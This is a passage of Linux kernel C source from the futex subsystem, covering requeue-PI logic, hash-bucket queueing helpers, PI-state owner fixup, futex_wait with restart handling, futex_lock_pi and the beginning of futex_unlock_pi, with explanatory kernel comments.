* atomic lock acquisition. Set the q->lock_ptr to the requeue target hb->lock
* to protect access to the pi_state to fixup the owner later. Must be called
* with both q->lock_ptr and hb->lock held.
*/
static inline
void requeue_pi_wake_futex(struct futex_q *q, union futex_key *key,
struct futex_hash_bucket *hb)
{
get_futex_key_refs(key);
q->key = *key;
__unqueue_futex(q);
WARN_ON(!q->rt_waiter);
q->rt_waiter = NULL;
q->lock_ptr = &hb->lock;
wake_up_state(q->task, TASK_NORMAL);
}
/**
* futex_proxy_trylock_atomic() - Attempt an atomic lock for the top waiter
* @pifutex: the user address of the to futex
* @hb1: the from futex hash bucket, must be locked by the caller
* @hb2: the to futex hash bucket, must be locked by the caller
* @key1: the from futex key
* @key2: the to futex key
* @ps: address to store the pi_state pointer
* @set_waiters: force setting the FUTEX_WAITERS bit (1) or not (0)
*
* Try and get the lock on behalf of the top waiter if we can do it atomically.
* Wake the top waiter if we succeed. If the caller specified set_waiters,
* then direct futex_lock_pi_atomic() to force setting the FUTEX_WAITERS bit.
* hb1 and hb2 must be held by the caller.
*
* Return:
* - 0 - failed to acquire the lock atomically;
* - >0 - acquired the lock, return value is vpid of the top_waiter
* - <0 - error
*/
static int futex_proxy_trylock_atomic(u32 __user *pifutex,
struct futex_hash_bucket *hb1,
struct futex_hash_bucket *hb2,
union futex_key *key1, union futex_key *key2,
struct futex_pi_state **ps, int set_waiters)
{
struct futex_q *top_waiter = NULL;
u32 curval;
int ret, vpid;
if (get_futex_value_locked(&curval, pifutex))
return -EFAULT;
if (unlikely(should_fail_futex(true)))
return -EFAULT;
/*
* Find the top_waiter and determine if there are additional waiters.
* If the caller intends to requeue more than 1 waiter to pifutex,
* force futex_lock_pi_atomic() to set the FUTEX_WAITERS bit now,
* as we have means to handle the possible fault. If not, don't set
	 * the bit unnecessarily as it will force the subsequent unlock to enter
* the kernel.
*/
top_waiter = futex_top_waiter(hb1, key1);
/* There are no waiters, nothing for us to do. */
if (!top_waiter)
return 0;
/* Ensure we requeue to the expected futex. */
if (!match_futex(top_waiter->requeue_pi_key, key2))
return -EINVAL;
/*
* Try to take the lock for top_waiter. Set the FUTEX_WAITERS bit in
* the contended case or if set_waiters is 1. The pi_state is returned
* in ps in contended cases.
*/
vpid = task_pid_vnr(top_waiter->task);
ret = futex_lock_pi_atomic(pifutex, hb2, key2, ps, top_waiter->task,
set_waiters);
if (ret == 1) {
requeue_pi_wake_futex(top_waiter, key2, hb2);
return vpid;
}
return ret;
}
/**
* futex_requeue() - Requeue waiters from uaddr1 to uaddr2
* @uaddr1: source futex user address
* @flags: futex flags (FLAGS_SHARED, etc.)
* @uaddr2: target futex user address
* @nr_wake: number of waiters to wake (must be 1 for requeue_pi)
* @nr_requeue: number of waiters to requeue (0-INT_MAX)
* @cmpval: @uaddr1 expected value (or %NULL)
* @requeue_pi: if we are attempting to requeue from a non-pi futex to a
* pi futex (pi to pi requeue is not supported)
*
* Requeue waiters on uaddr1 to uaddr2. In the requeue_pi case, try to acquire
* uaddr2 atomically on behalf of the top waiter.
*
* Return:
* - >=0 - on success, the number of tasks requeued or woken;
* - <0 - on error
*/
static int futex_requeue(u32 __user *uaddr1, unsigned int flags,
u32 __user *uaddr2, int nr_wake, int nr_requeue,
u32 *cmpval, int requeue_pi)
{
union futex_key key1 = FUTEX_KEY_INIT, key2 = FUTEX_KEY_INIT;
int drop_count = 0, task_count = 0, ret;
struct futex_pi_state *pi_state = NULL;
struct futex_hash_bucket *hb1, *hb2;
struct futex_q *this, *next;
DEFINE_WAKE_Q(wake_q);
if (nr_wake < 0 || nr_requeue < 0)
return -EINVAL;
/*
	 * When PI is not supported: return -ENOSYS if requeue_pi is true,
* consequently the compiler knows requeue_pi is always false past
* this point which will optimize away all the conditional code
* further down.
*/
if (!IS_ENABLED(CONFIG_FUTEX_PI) && requeue_pi)
return -ENOSYS;
if (requeue_pi) {
/*
* Requeue PI only works on two distinct uaddrs. This
* check is only valid for private futexes. See below.
*/
if (uaddr1 == uaddr2)
return -EINVAL;
/*
* requeue_pi requires a pi_state, try to allocate it now
* without any locks in case it fails.
*/
if (refill_pi_state_cache())
return -ENOMEM;
/*
* requeue_pi must wake as many tasks as it can, up to nr_wake
* + nr_requeue, since it acquires the rt_mutex prior to
* returning to userspace, so as to not leave the rt_mutex with
* waiters and no owner. However, second and third wake-ups
* cannot be predicted as they involve race conditions with the
* first wake and a fault while looking up the pi_state. Both
* pthread_cond_signal() and pthread_cond_broadcast() should
* use nr_wake=1.
*/
if (nr_wake != 1)
return -EINVAL;
}
retry:
ret = get_futex_key(uaddr1, flags & FLAGS_SHARED, &key1, VERIFY_READ);
if (unlikely(ret != 0))
goto out;
ret = get_futex_key(uaddr2, flags & FLAGS_SHARED, &key2,
requeue_pi ? VERIFY_WRITE : VERIFY_READ);
if (unlikely(ret != 0))
goto out_put_key1;
/*
* The check above which compares uaddrs is not sufficient for
* shared futexes. We need to compare the keys:
*/
if (requeue_pi && match_futex(&key1, &key2)) {
ret = -EINVAL;
goto out_put_keys;
}
hb1 = hash_futex(&key1);
hb2 = hash_futex(&key2);
retry_private:
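	/*
	 * Account a prospective waiter on the target bucket before taking
	 * the locks, so that a concurrent futex_wake() on uaddr2 sees
	 * hb_waiters_pending() and does not skip hb2 while we requeue.
	 */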
hb_waiters_inc(hb2);
double_lock_hb(hb1, hb2);
if (likely(cmpval != NULL)) {
u32 curval;
ret = get_futex_value_locked(&curval, uaddr1);
if (unlikely(ret)) {
double_unlock_hb(hb1, hb2);
hb_waiters_dec(hb2);
ret = get_user(curval, uaddr1);
if (ret)
goto out_put_keys;
if (!(flags & FLAGS_SHARED))
goto retry_private;
put_futex_key(&key2);
put_futex_key(&key1);
goto retry;
}
if (curval != *cmpval) {
ret = -EAGAIN;
goto out_unlock;
}
}
if (requeue_pi && (task_count - nr_wake < nr_requeue)) {
/*
* Attempt to acquire uaddr2 and wake the top waiter. If we
* intend to requeue waiters, force setting the FUTEX_WAITERS
* bit. We force this here where we are able to easily handle
		 * faults rather than in the requeue loop below.
*/
ret = futex_proxy_trylock_atomic(uaddr2, hb1, hb2, &key1,
&key2, &pi_state, nr_requeue);
/*
* At this point the top_waiter has either taken uaddr2 or is
* waiting on it. If the former, then the pi_state will not
* exist yet, look it up one more time to ensure we have a
* reference to it. If the lock was taken, ret contains the
* vpid of the top waiter task.
* If the lock was not taken, we have pi_state and an initial
* refcount on it. In case of an error we have nothing.
*/
if (ret > 0) {
WARN_ON(pi_state);
drop_count++;
task_count++;
/*
* If we acquired the lock, then the user space value
* of uaddr2 should be vpid. It cannot be changed by
* the top waiter as it is blocked on hb2 lock if it
* tries to do so. If something fiddled with it behind
* our back the pi state lookup might unearth it. So
			 * we would rather use the known value than reread it
			 * and hand potential crap to lookup_pi_state().
*
* If that call succeeds then we have pi_state and an
* initial refcount on it.
*/
ret = lookup_pi_state(uaddr2, ret, hb2, &key2, &pi_state);
}
switch (ret) {
case 0:
/* We hold a reference on the pi state. */
break;
/* If the above failed, then pi_state is NULL */
case -EFAULT:
double_unlock_hb(hb1, hb2);
hb_waiters_dec(hb2);
put_futex_key(&key2);
put_futex_key(&key1);
ret = fault_in_user_writeable(uaddr2);
if (!ret)
goto retry;
goto out;
case -EAGAIN:
/*
* Two reasons for this:
* - Owner is exiting and we just wait for the
* exit to complete.
* - The user space value changed.
*/
double_unlock_hb(hb1, hb2);
hb_waiters_dec(hb2);
put_futex_key(&key2);
put_futex_key(&key1);
cond_resched();
goto retry;
default:
goto out_unlock;
}
}
plist_for_each_entry_safe(this, next, &hb1->chain, list) {
if (task_count - nr_wake >= nr_requeue)
break;
if (!match_futex(&this->key, &key1))
continue;
/*
		 * FUTEX_WAIT_REQUEUE_PI and FUTEX_CMP_REQUEUE_PI should always
* be paired with each other and no other futex ops.
*
* We should never be requeueing a futex_q with a pi_state,
* which is awaiting a futex_unlock_pi().
*/
if ((requeue_pi && !this->rt_waiter) ||
(!requeue_pi && this->rt_waiter) ||
this->pi_state) {
ret = -EINVAL;
break;
}
/*
* Wake nr_wake waiters. For requeue_pi, if we acquired the
* lock, we already woke the top_waiter. If not, it will be
* woken by futex_unlock_pi().
*/
if (++task_count <= nr_wake && !requeue_pi) {
mark_wake_futex(&wake_q, this);
continue;
}
/* Ensure we requeue to the expected futex for requeue_pi. */
if (requeue_pi && !match_futex(this->requeue_pi_key, &key2)) {
ret = -EINVAL;
break;
}
/*
* Requeue nr_requeue waiters and possibly one more in the case
* of requeue_pi if we couldn't acquire the lock atomically.
*/
if (requeue_pi) {
/*
* Prepare the waiter to take the rt_mutex. Take a
* refcount on the pi_state and store the pointer in
* the futex_q object of the waiter.
*/
get_pi_state(pi_state);
this->pi_state = pi_state;
ret = rt_mutex_start_proxy_lock(&pi_state->pi_mutex,
this->rt_waiter,
this->task);
if (ret == 1) {
/*
* We got the lock. We do neither drop the
* refcount on pi_state nor clear
* this->pi_state because the waiter needs the
* pi_state for cleaning up the user space
* value. It will drop the refcount after
* doing so.
*/
requeue_pi_wake_futex(this, &key2, hb2);
drop_count++;
continue;
} else if (ret) {
/*
* rt_mutex_start_proxy_lock() detected a
* potential deadlock when we tried to queue
* that waiter. Drop the pi_state reference
* which we took above and remove the pointer
* to the state from the waiters futex_q
* object.
*/
this->pi_state = NULL;
put_pi_state(pi_state);
/*
* We stop queueing more waiters and let user
* space deal with the mess.
*/
break;
}
}
requeue_futex(this, hb1, hb2, &key2);
drop_count++;
}
/*
* We took an extra initial reference to the pi_state either
* in futex_proxy_trylock_atomic() or in lookup_pi_state(). We
* need to drop it here again.
*/
put_pi_state(pi_state);
out_unlock:
double_unlock_hb(hb1, hb2);
wake_up_q(&wake_q);
hb_waiters_dec(hb2);
/*
* drop_futex_key_refs() must be called outside the spinlocks. During
* the requeue we moved futex_q's from the hash bucket at key1 to the
* one at key2 and updated their key pointer. We no longer need to
* hold the references to key1.
*/
while (--drop_count >= 0)
drop_futex_key_refs(&key1);
out_put_keys:
put_futex_key(&key2);
out_put_key1:
put_futex_key(&key1);
out:
return ret ? ret : task_count;
}
/* The key must be already stored in q->key. */
static inline struct futex_hash_bucket *queue_lock(struct futex_q *q)
__acquires(&hb->lock)
{
struct futex_hash_bucket *hb;
hb = hash_futex(&q->key);
/*
* Increment the counter before taking the lock so that
* a potential waker won't miss a to-be-slept task that is
* waiting for the spinlock. This is safe as all queue_lock()
* users end up calling queue_me(). Similarly, for housekeeping,
* decrement the counter at queue_unlock() when some error has
* occurred and we don't end up adding the task to the list.
*/
hb_waiters_inc(hb);
q->lock_ptr = &hb->lock;
spin_lock(&hb->lock); /* implies smp_mb(); (A) */
return hb;
}
static inline void
queue_unlock(struct futex_hash_bucket *hb)
__releases(&hb->lock)
{
spin_unlock(&hb->lock);
hb_waiters_dec(hb);
}
static inline void __queue_me(struct futex_q *q, struct futex_hash_bucket *hb)
{
int prio;
/*
* The priority used to register this element is
* - either the real thread-priority for the real-time threads
* (i.e. threads with a priority lower than MAX_RT_PRIO)
* - or MAX_RT_PRIO for non-RT threads.
* Thus, all RT-threads are woken first in priority order, and
* the others are woken last, in FIFO order.
*/
prio = min(current->normal_prio, MAX_RT_PRIO);
plist_node_init(&q->list, prio);
plist_add(&q->list, &hb->chain);
q->task = current;
}
/**
* queue_me() - Enqueue the futex_q on the futex_hash_bucket
* @q: The futex_q to enqueue
* @hb: The destination hash bucket
*
* The hb->lock must be held by the caller, and is released here. A call to
* queue_me() is typically paired with exactly one call to unqueue_me(). The
* exceptions involve the PI related operations, which may use unqueue_me_pi()
* or nothing if the unqueue is done as part of the wake process and the unqueue
 * state is implicit in the state of the woken task (see futex_wait_requeue_pi() for
* an example).
*/
static inline void queue_me(struct futex_q *q, struct futex_hash_bucket *hb)
__releases(&hb->lock)
{
__queue_me(q, hb);
spin_unlock(&hb->lock);
}
/**
* unqueue_me() - Remove the futex_q from its futex_hash_bucket
* @q: The futex_q to unqueue
*
* The q->lock_ptr must not be held by the caller. A call to unqueue_me() must
* be paired with exactly one earlier call to queue_me().
*
* Return:
 * - 1 - if the futex_q was still queued (and we removed it);
* - 0 - if the futex_q was already removed by the waking thread
*/
static int unqueue_me(struct futex_q *q)
{
spinlock_t *lock_ptr;
int ret = 0;
/* In the common case we don't take the spinlock, which is nice. */
retry:
/*
* q->lock_ptr can change between this read and the following spin_lock.
* Use READ_ONCE to forbid the compiler from reloading q->lock_ptr and
* optimizing lock_ptr out of the logic below.
*/
lock_ptr = READ_ONCE(q->lock_ptr);
if (lock_ptr != NULL) {
spin_lock(lock_ptr);
/*
* q->lock_ptr can change between reading it and
* spin_lock(), causing us to take the wrong lock. This
* corrects the race condition.
*
* Reasoning goes like this: if we have the wrong lock,
* q->lock_ptr must have changed (maybe several times)
* between reading it and the spin_lock(). It can
* change again after the spin_lock() but only if it was
* already changed before the spin_lock(). It cannot,
* however, change back to the original value. Therefore
* we can detect whether we acquired the correct lock.
*/
if (unlikely(lock_ptr != q->lock_ptr)) {
spin_unlock(lock_ptr);
goto retry;
}
__unqueue_futex(q);
BUG_ON(q->pi_state);
spin_unlock(lock_ptr);
ret = 1;
}
drop_futex_key_refs(&q->key);
return ret;
}
/*
 * PI futexes cannot be requeued and must remove themselves from the
* hash bucket. The hash bucket lock (i.e. lock_ptr) is held on entry
* and dropped here.
*/
static void unqueue_me_pi(struct futex_q *q)
__releases(q->lock_ptr)
{
__unqueue_futex(q);
BUG_ON(!q->pi_state);
put_pi_state(q->pi_state);
q->pi_state = NULL;
spin_unlock(q->lock_ptr);
}
static int fixup_pi_state_owner(u32 __user *uaddr, struct futex_q *q,
struct task_struct *argowner)
{
struct futex_pi_state *pi_state = q->pi_state;
u32 uval, uninitialized_var(curval), newval;
struct task_struct *oldowner, *newowner;
u32 newtid;
int ret;
lockdep_assert_held(q->lock_ptr);
raw_spin_lock_irq(&pi_state->pi_mutex.wait_lock);
oldowner = pi_state->owner;
	/*
	 * Note: the FUTEX_OWNER_DIED bit is preserved from the user space
	 * value in the cmpxchg loop below; newtid is computed once the new
	 * owner is known.
	 */
/*
* We are here because either:
*
* - we stole the lock and pi_state->owner needs updating to reflect
* that (@argowner == current),
*
* or:
*
* - someone stole our lock and we need to fix things to point to the
* new owner (@argowner == NULL).
*
* Either way, we have to replace the TID in the user space variable.
* This must be atomic as we have to preserve the owner died bit here.
*
* Note: We write the user space value _before_ changing the pi_state
* because we can fault here. Imagine swapped out pages or a fork
* that marked all the anonymous memory readonly for cow.
*
* Modifying pi_state _before_ the user space value would leave the
* pi_state in an inconsistent state when we fault here, because we
* need to drop the locks to handle the fault. This might be observed
* in the PID check in lookup_pi_state.
*/
retry:
if (!argowner) {
if (oldowner != current) {
/*
* We raced against a concurrent self; things are
* already fixed up. Nothing to do.
*/
ret = 0;
goto out_unlock;
}
if (__rt_mutex_futex_trylock(&pi_state->pi_mutex)) {
/* We got the lock after all, nothing to fix. */
ret = 0;
goto out_unlock;
}
/*
* Since we just failed the trylock; there must be an owner.
*/
newowner = rt_mutex_owner(&pi_state->pi_mutex);
BUG_ON(!newowner);
} else {
WARN_ON_ONCE(argowner != current);
if (oldowner == current) {
/*
* We raced against a concurrent self; things are
* already fixed up. Nothing to do.
*/
ret = 0;
goto out_unlock;
}
newowner = argowner;
}
newtid = task_pid_vnr(newowner) | FUTEX_WAITERS;
if (get_futex_value_locked(&uval, uaddr))
goto handle_fault;
for (;;) {
newval = (uval & FUTEX_OWNER_DIED) | newtid;
if (cmpxchg_futex_value_locked(&curval, uaddr, uval, newval))
goto handle_fault;
if (curval == uval)
break;
uval = curval;
}
/*
* We fixed up user space. Now we need to fix the pi_state
* itself.
*/
if (pi_state->owner != NULL) {
raw_spin_lock(&pi_state->owner->pi_lock);
WARN_ON(list_empty(&pi_state->list));
list_del_init(&pi_state->list);
raw_spin_unlock(&pi_state->owner->pi_lock);
}
pi_state->owner = newowner;
raw_spin_lock(&newowner->pi_lock);
WARN_ON(!list_empty(&pi_state->list));
list_add(&pi_state->list, &newowner->pi_state_list);
raw_spin_unlock(&newowner->pi_lock);
raw_spin_unlock_irq(&pi_state->pi_mutex.wait_lock);
return 0;
/*
* To handle the page fault we need to drop the locks here. That gives
* the other task (either the highest priority waiter itself or the
* task which stole the rtmutex) the chance to try the fixup of the
* pi_state. So once we are back from handling the fault we need to
* check the pi_state after reacquiring the locks and before trying to
* do another fixup. When the fixup has been done already we simply
* return.
*
* Note: we hold both hb->lock and pi_mutex->wait_lock. We can safely
* drop hb->lock since the caller owns the hb -> futex_q relation.
	 * Dropping the pi_mutex->wait_lock requires revalidating the state.
*/
handle_fault:
raw_spin_unlock_irq(&pi_state->pi_mutex.wait_lock);
spin_unlock(q->lock_ptr);
ret = fault_in_user_writeable(uaddr);
spin_lock(q->lock_ptr);
raw_spin_lock_irq(&pi_state->pi_mutex.wait_lock);
/*
* Check if someone else fixed it for us:
*/
if (pi_state->owner != oldowner) {
ret = 0;
goto out_unlock;
}
if (ret)
goto out_unlock;
goto retry;
out_unlock:
raw_spin_unlock_irq(&pi_state->pi_mutex.wait_lock);
return ret;
}
static long futex_wait_restart(struct restart_block *restart);
/**
* fixup_owner() - Post lock pi_state and corner case management
* @uaddr: user address of the futex
* @q: futex_q (contains pi_state and access to the rt_mutex)
* @locked: if the attempt to take the rt_mutex succeeded (1) or not (0)
*
* After attempting to lock an rt_mutex, this function is called to cleanup
* the pi_state owner as well as handle race conditions that may allow us to
* acquire the lock. Must be called with the hb lock held.
*
* Return:
* - 1 - success, lock taken;
* - 0 - success, lock not taken;
* - <0 - on error (-EFAULT)
*/
static int fixup_owner(u32 __user *uaddr, struct futex_q *q, int locked)
{
int ret = 0;
if (locked) {
/*
* Got the lock. We might not be the anticipated owner if we
* did a lock-steal - fix up the PI-state in that case:
*
* Speculative pi_state->owner read (we don't hold wait_lock);
* since we own the lock pi_state->owner == current is the
* stable state, anything else needs more attention.
*/
if (q->pi_state->owner != current)
ret = fixup_pi_state_owner(uaddr, q, current);
goto out;
}
/*
* If we didn't get the lock; check if anybody stole it from us. In
* that case, we need to fix up the uval to point to them instead of
* us, otherwise bad things happen. [10]
*
* Another speculative read; pi_state->owner == current is unstable
* but needs our attention.
*/
if (q->pi_state->owner == current) {
ret = fixup_pi_state_owner(uaddr, q, NULL);
goto out;
}
/*
* Paranoia check. If we did not take the lock, then we should not be
* the owner of the rt_mutex.
*/
if (rt_mutex_owner(&q->pi_state->pi_mutex) == current) {
printk(KERN_ERR "fixup_owner: ret = %d pi-mutex: %p "
"pi-state %p\n", ret,
q->pi_state->pi_mutex.owner,
q->pi_state->owner);
}
out:
return ret ? ret : locked;
}
/**
* futex_wait_queue_me() - queue_me() and wait for wakeup, timeout, or signal
* @hb: the futex hash bucket, must be locked by the caller
* @q: the futex_q to queue up on
* @timeout: the prepared hrtimer_sleeper, or null for no timeout
*/
static void futex_wait_queue_me(struct futex_hash_bucket *hb, struct futex_q *q,
struct hrtimer_sleeper *timeout)
{
/*
* The task state is guaranteed to be set before another task can
* wake it. set_current_state() is implemented using smp_store_mb() and
* queue_me() calls spin_unlock() upon completion, both serializing
* access to the hash list and forcing another memory barrier.
*/
set_current_state(TASK_INTERRUPTIBLE);
queue_me(q, hb);
/* Arm the timer */
if (timeout)
hrtimer_start_expires(&timeout->timer, HRTIMER_MODE_ABS);
/*
* If we have been removed from the hash list, then another task
* has tried to wake us, and we can skip the call to schedule().
*/
if (likely(!plist_node_empty(&q->list))) {
/*
* If the timer has already expired, current will already be
* flagged for rescheduling. Only call schedule if there
* is no timeout, or if it has yet to expire.
*/
if (!timeout || timeout->task)
freezable_schedule();
}
__set_current_state(TASK_RUNNING);
}
/**
* futex_wait_setup() - Prepare to wait on a futex
* @uaddr: the futex userspace address
* @val: the expected value
* @flags: futex flags (FLAGS_SHARED, etc.)
* @q: the associated futex_q
* @hb: storage for hash_bucket pointer to be returned to caller
*
* Setup the futex_q and locate the hash_bucket. Get the futex value and
* compare it with the expected value. Handle atomic faults internally.
* Return with the hb lock held and a q.key reference on success, and unlocked
* with no q.key reference on failure.
*
* Return:
* - 0 - uaddr contains val and hb has been locked;
 * - <0 - -EFAULT or -EWOULDBLOCK (uaddr does not contain val) and hb is unlocked
*/
static int futex_wait_setup(u32 __user *uaddr, u32 val, unsigned int flags,
struct futex_q *q, struct futex_hash_bucket **hb)
{
u32 uval;
int ret;
/*
* Access the page AFTER the hash-bucket is locked.
* Order is important:
*
* Userspace waiter: val = var; if (cond(val)) futex_wait(&var, val);
* Userspace waker: if (cond(var)) { var = new; futex_wake(&var); }
*
* The basic logical guarantee of a futex is that it blocks ONLY
* if cond(var) is known to be true at the time of blocking, for
* any cond. If we locked the hash-bucket after testing *uaddr, that
* would open a race condition where we could block indefinitely with
* cond(var) false, which would violate the guarantee.
*
* On the other hand, we insert q and release the hash-bucket only
* after testing *uaddr. This guarantees that futex_wait() will NOT
* absorb a wakeup if *uaddr does not match the desired values
* while the syscall executes.
*/
retry:
ret = get_futex_key(uaddr, flags & FLAGS_SHARED, &q->key, VERIFY_READ);
if (unlikely(ret != 0))
return ret;
retry_private:
*hb = queue_lock(q);
ret = get_futex_value_locked(&uval, uaddr);
if (ret) {
queue_unlock(*hb);
ret = get_user(uval, uaddr);
if (ret)
goto out;
if (!(flags & FLAGS_SHARED))
goto retry_private;
put_futex_key(&q->key);
goto retry;
}
if (uval != val) {
queue_unlock(*hb);
ret = -EWOULDBLOCK;
}
out:
if (ret)
put_futex_key(&q->key);
return ret;
}
static int futex_wait(u32 __user *uaddr, unsigned int flags, u32 val,
ktime_t *abs_time, u32 bitset)
{
struct hrtimer_sleeper timeout, *to = NULL;
struct restart_block *restart;
struct futex_hash_bucket *hb;
struct futex_q q = futex_q_init;
int ret;
if (!bitset)
return -EINVAL;
q.bitset = bitset;
if (abs_time) {
to = &timeout;
hrtimer_init_on_stack(&to->timer, (flags & FLAGS_CLOCKRT) ?
CLOCK_REALTIME : CLOCK_MONOTONIC,
HRTIMER_MODE_ABS);
hrtimer_init_sleeper(to, current);
hrtimer_set_expires_range_ns(&to->timer, *abs_time,
current->timer_slack_ns);
}
retry:
/*
* Prepare to wait on uaddr. On success, holds hb lock and increments
* q.key refs.
*/
ret = futex_wait_setup(uaddr, val, flags, &q, &hb);
if (ret)
goto out;
/* queue_me and wait for wakeup, timeout, or a signal. */
futex_wait_queue_me(hb, &q, to);
/* If we were woken (and unqueued), we succeeded, whatever. */
ret = 0;
/* unqueue_me() drops q.key ref */
if (!unqueue_me(&q))
goto out;
ret = -ETIMEDOUT;
if (to && !to->task)
goto out;
/*
* We expect signal_pending(current), but we might be the
* victim of a spurious wakeup as well.
*/
if (!signal_pending(current))
goto retry;
ret = -ERESTARTSYS;
if (!abs_time)
goto out;
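	/*
	 * A signal arrived while waiting with an absolute timeout. Set up
	 * a restart block so that, once the signal has been handled, the
	 * syscall is transparently restarted with the same parameters and
	 * the original absolute expiry time.
	 */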
	restart = &current->restart_block;
restart->fn = futex_wait_restart;
restart->futex.uaddr = uaddr;
restart->futex.val = val;
restart->futex.time = *abs_time;
restart->futex.bitset = bitset;
restart->futex.flags = flags | FLAGS_HAS_TIMEOUT;
ret = -ERESTART_RESTARTBLOCK;
out:
if (to) {
hrtimer_cancel(&to->timer);
destroy_hrtimer_on_stack(&to->timer);
}
return ret;
}
static long futex_wait_restart(struct restart_block *restart)
{
u32 __user *uaddr = restart->futex.uaddr;
ktime_t t, *tp = NULL;
if (restart->futex.flags & FLAGS_HAS_TIMEOUT) {
t = restart->futex.time;
tp = &t;
}
restart->fn = do_no_restart_syscall;
return (long)futex_wait(uaddr, restart->futex.flags,
restart->futex.val, tp, restart->futex.bitset);
}
/*
* Userspace tried a 0 -> TID atomic transition of the futex value
* and failed. The kernel side here does the whole locking operation:
* if there are waiters then it will block as a consequence of relying
* on rt-mutexes, it does PI, etc. (Due to races the kernel might see
 * a 0 value of the futex too.)
 *
 * Also serves as the futex trylock_pi() operation, with the
 * corresponding semantics.
*/
static int futex_lock_pi(u32 __user *uaddr, unsigned int flags,
ktime_t *time, int trylock)
{
struct hrtimer_sleeper timeout, *to = NULL;
struct futex_pi_state *pi_state = NULL;
struct rt_mutex_waiter rt_waiter;
struct futex_hash_bucket *hb;
struct futex_q q = futex_q_init;
int res, ret;
if (!IS_ENABLED(CONFIG_FUTEX_PI))
return -ENOSYS;
if (refill_pi_state_cache())
return -ENOMEM;
if (time) {
to = &timeout;
hrtimer_init_on_stack(&to->timer, CLOCK_REALTIME,
HRTIMER_MODE_ABS);
hrtimer_init_sleeper(to, current);
hrtimer_set_expires(&to->timer, *time);
}
retry:
ret = get_futex_key(uaddr, flags & FLAGS_SHARED, &q.key, VERIFY_WRITE);
if (unlikely(ret != 0))
goto out;
retry_private:
hb = queue_lock(&q);
ret = futex_lock_pi_atomic(uaddr, hb, &q.key, &q.pi_state, current, 0);
if (unlikely(ret)) {
/*
* Atomic work succeeded and we got the lock,
* or failed. Either way, we do _not_ block.
*/
switch (ret) {
case 1:
/* We got the lock. */
ret = 0;
goto out_unlock_put_key;
case -EFAULT:
goto uaddr_faulted;
case -EAGAIN:
/*
* Two reasons for this:
* - Task is exiting and we just wait for the
* exit to complete.
* - The user space value changed.
*/
queue_unlock(hb);
put_futex_key(&q.key);
cond_resched();
goto retry;
default:
goto out_unlock_put_key;
}
}
WARN_ON(!q.pi_state);
/*
* Only actually queue now that the atomic ops are done:
*/
__queue_me(&q, hb);
if (trylock) {
ret = rt_mutex_futex_trylock(&q.pi_state->pi_mutex);
/* Fixup the trylock return value: */
ret = ret ? 0 : -EWOULDBLOCK;
goto no_block;
}
rt_mutex_init_waiter(&rt_waiter);
/*
* On PREEMPT_RT_FULL, when hb->lock becomes an rt_mutex, we must not
* hold it while doing rt_mutex_start_proxy(), because then it will
	 * include hb->lock in the blocking chain, even though we will not in
* fact hold it while blocking. This will lead it to report -EDEADLK
* and BUG when futex_unlock_pi() interleaves with this.
*
* Therefore acquire wait_lock while holding hb->lock, but drop the
* latter before calling rt_mutex_start_proxy_lock(). This still fully
* serializes against futex_unlock_pi() as that does the exact same
* lock handoff sequence.
*/
raw_spin_lock_irq(&q.pi_state->pi_mutex.wait_lock);
spin_unlock(q.lock_ptr);
ret = __rt_mutex_start_proxy_lock(&q.pi_state->pi_mutex, &rt_waiter, current);
raw_spin_unlock_irq(&q.pi_state->pi_mutex.wait_lock);
if (ret) {
if (ret == 1)
ret = 0;
spin_lock(q.lock_ptr);
goto no_block;
}
if (unlikely(to))
hrtimer_start_expires(&to->timer, HRTIMER_MODE_ABS);
ret = rt_mutex_wait_proxy_lock(&q.pi_state->pi_mutex, to, &rt_waiter);
spin_lock(q.lock_ptr);
/*
* If we failed to acquire the lock (signal/timeout), we must
* first acquire the hb->lock before removing the lock from the
* rt_mutex waitqueue, such that we can keep the hb and rt_mutex
* wait lists consistent.
*
* In particular; it is important that futex_unlock_pi() can not
* observe this inconsistency.
*/
if (ret && !rt_mutex_cleanup_proxy_lock(&q.pi_state->pi_mutex, &rt_waiter))
ret = 0;
no_block:
/*
* Fixup the pi_state owner and possibly acquire the lock if we
* haven't already.
*/
res = fixup_owner(uaddr, &q, !ret);
/*
	 * If fixup_owner() returned an error, propagate that. If it acquired
* the lock, clear our -ETIMEDOUT or -EINTR.
*/
if (res)
ret = (res < 0) ? res : 0;
/*
* If fixup_owner() faulted and was unable to handle the fault, unlock
* it and return the fault to userspace.
*/
if (ret && (rt_mutex_owner(&q.pi_state->pi_mutex) == current)) {
pi_state = q.pi_state;
get_pi_state(pi_state);
}
/* Unqueue and drop the lock */
unqueue_me_pi(&q);
if (pi_state) {
rt_mutex_futex_unlock(&pi_state->pi_mutex);
put_pi_state(pi_state);
}
goto out_put_key;
out_unlock_put_key:
queue_unlock(hb);
out_put_key:
put_futex_key(&q.key);
out:
if (to) {
hrtimer_cancel(&to->timer);
destroy_hrtimer_on_stack(&to->timer);
}
return ret != -EINTR ? ret : -ERESTARTNOINTR;
uaddr_faulted:
queue_unlock(hb);
ret = fault_in_user_writeable(uaddr);
if (ret)
goto out_put_key;
if (!(flags & FLAGS_SHARED))
goto retry_private;
put_futex_key(&q.key);
goto retry;
}
/*
* Userspace attempted a TID -> 0 atomic transition, and failed.
* This is the in-kernel slowpath: we look up the PI state (if any),
* and do the rt-mutex unlock.
*/
static int futex_unlock_pi(u32 __user *uaddr, unsigned int flags)
{
u32 uninitialized_var(curval), uval, vpid = task_pid_vnr(current);
union futex_key key = FUTEX_KEY_INIT;
struct futex_hash_bucket *hb;
struct futex_q *top_waiter;
int ret;
if (!IS_ENABLED(CONFIG_FUTEX_PI))
return -ENOSYS;
retry:
if (get_user(uval, uaddr))
return -EFAULT;
/*
* We release only a lock we actually own:
*/
if ((uval & FUTEX_TID_MASK) != vpid)
return -EPERM;
ret = get_futex_key(uaddr, flags & FLAGS_SHARED, &key, VERIFY_WRITE);
if (ret)
return ret;
hb = hash_futex(&key);
spin_lock(&hb->lock);
/*
* Check waiters first. We do not trust user space values at
* all and we at least want to know if user space fiddled
* with the futex value instead of blindly unlocking.
*/
top_waiter = futex_top_waiter(hb, &key);
if (top_waiter) {
struct futex_pi_state *pi_state = top_waiter->pi_state;
ret = -EINVAL;
if (!pi_state)
goto out_unlock;
/*
* If current does not own the pi_state then the futex is
* inconsistent and user space fiddled with the futex value.
*/
if (pi_state->owner != current)
goto out_unlock;
get_pi_state(pi_state);
/*
* By taking wait_lock while still holding hb->lock, we ensure
* there is no point where we hold neither; and therefore
* wake_futex_pi() must observe a state consistent with what we
* observed.
*/
raw_spin_lock_irq(&pi_state->pi_mutex.wait_lock);
spin_unlock(&hb->lock);
/* drops pi_state->pi_mutex.wait_lock */
ret = wake_futex_pi(uaddr, uval, pi_state);
